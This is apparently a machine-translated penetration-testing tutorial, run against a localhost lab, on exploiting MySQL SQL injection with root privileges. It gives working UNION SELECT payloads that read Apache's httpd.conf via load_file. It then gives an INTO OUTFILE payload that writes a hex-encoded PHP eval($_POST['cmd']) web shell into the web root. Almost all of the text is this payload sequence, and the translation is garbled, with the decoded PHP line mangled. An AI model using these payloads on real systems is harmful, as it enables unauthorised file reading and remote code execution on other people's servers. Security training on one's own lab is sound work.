MySQL inject root permission directly write a word horse

First we find an injected station: Here I use my own environment to express; Let's not mess around.

Http://localhost/pentest/sql/sql_injection_get.php?id=1

Discovery is root permission, we try to write the horse directly

First, find the Web site's home directory:

Database directory: D:\wamp\bin\mysql\mysql5.5.20\data\

To judge, the server may be wampserver, httpd.conf file in d:/wamp/bin/apache/apache2.2.21/conf/httpd.conf

Http://localhost/pentest/sql/sql_injection_get.php?id=1 ' and 1=2 Union select Load_file (' d:/wamp/bin/apache/ Apache2.2.21/conf/httpd.conf ') from user--+

If this is unsuccessful, it is recommended that you convert the directory to hex code: Load_file ( 0X443A5C77616D705C62696E5C6170616368655C417061636865322E322E32315C636F6E665C68747470642E636F6E66)

Found Site Directory: d:/wamp/www

We try to write:

Http://localhost/pentest/sql/sql_injection_get.php?id=1 ' and 1=2 Union Select 1,2,0x3c3f706870206576616c28245f504f53545b27636d64275d293b3f3e to OutFile ' d:/wamp/www/xx.php ' from user--+

<?php eval ($_post[' cmd ');? Hex code for >: 0x3c3f706870206576616c28245f504f53545b27636d64275d293b3f3e

Then visit: http://localhost/xx.php

MySQL inject root permission directly write a word horse